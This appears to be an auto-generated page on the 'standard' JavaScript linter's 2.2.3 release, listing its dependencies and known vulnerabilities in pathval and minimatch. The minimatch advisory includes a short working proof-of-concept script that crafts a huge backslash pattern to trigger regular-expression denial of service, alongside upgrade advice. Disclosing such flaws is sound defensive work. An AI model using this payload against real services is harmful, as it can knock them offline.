Standard, a popular JavaScript style guide and linter, saw a minor version update from 2.2.2 to 2.2.3. Both versions share the same core dependencies, including tools like glob for file matching, jscs for code style checking (though later superseded by ESLint), split for stream processing, eslint for linting, jshint for JavaScript validation, minimist for argument parsing, find-root for locating the project root, minimatch for globbing, and run-parallel for concurrent execution. Their development dependencies also remained consistent, comprising mkdirp for creating directories, rimraf for removing files, extend.js for object extension, and run-series for sequential execution of tasks.
The key distinction between the two versions lies in their release dates. Version 2.2.3 was published shortly after 2.2.2, specifically, approximately one hour and thirteen minutes. This suggests that version 2.2.3 most likely addresses a bug fix or a small, immediate improvement identified in version 2.2.2. It's crucial for developers using standard to consider this update to ensure they're benefiting from the latest refinements and potential bug fixes, ensuring smoother code analysis and adherence to the Standard JavaScript Style. As the core dependencies remain identical, the upgrade process should be straightforward with minimal risk of compatibility issues.
All the vulnerabilities related to the version 2.2.3 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.